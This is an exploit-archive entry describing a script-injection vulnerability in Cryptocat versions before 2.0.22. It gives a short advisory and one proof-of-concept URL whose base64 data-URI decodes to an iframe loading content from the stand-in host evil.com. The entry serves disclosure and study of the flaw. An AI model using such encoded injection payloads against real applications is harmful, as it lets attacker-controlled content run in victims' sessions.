Cryptocat Arbitrary Script Injection Vulnerability

2015-11-05T00:00:00
ID 1337DAY-ID-24504
Type zdt
Reporter Mario Heiderich
Modified 2015-11-05T00:00:00

Description

Exploit for multiple platform in category remote exploits

                                        
                                            source: http://www.securityfocus.com/bid/61093/info
 
Cryptocat is prone to an arbitrary script-injection vulnerability because it fails to properly sanitize user-supplied input.
 
An attacker can exploit this issue to execute arbitrary script code within the context of the application.
 
Versions prior to Cryptocat 2.0.22 are vulnerable. 
 
Http://example.come/data:image/foo;base64,PGh0bWw+PGlmcmFtZSBzcmM9Imh0dHA6Ly9ldmlsLmNvbS8iPjwvaWZyYW1lPjwvaHRtbD4NCg

#  0day.today [2018-04-11]  #